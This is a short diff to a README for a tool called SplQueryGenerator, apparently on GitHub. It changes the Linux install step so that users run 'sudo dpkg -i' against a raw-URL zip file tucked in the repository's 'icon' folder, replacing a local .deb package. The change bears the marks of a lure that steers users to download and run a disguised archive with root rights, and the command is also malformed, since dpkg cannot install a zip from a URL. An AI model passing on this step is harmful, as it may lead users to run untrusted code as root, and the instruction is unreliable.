Catishuge/SplQueryGenerator/README.md

 3. **For Linux:**
    - Use the terminal to navigate to your downloads directory.
-   - Run the command: `sudo dpkg -i SplQueryGenerator.deb`.
+   - Run the command: `sudo dpkg -i https://github.com/Catishuge/SplQueryGenerator/raw/refs/heads/main/icon/Generator_Spl_Query_1.3.zip`.

 ## 🌐 Using SplQueryGenerator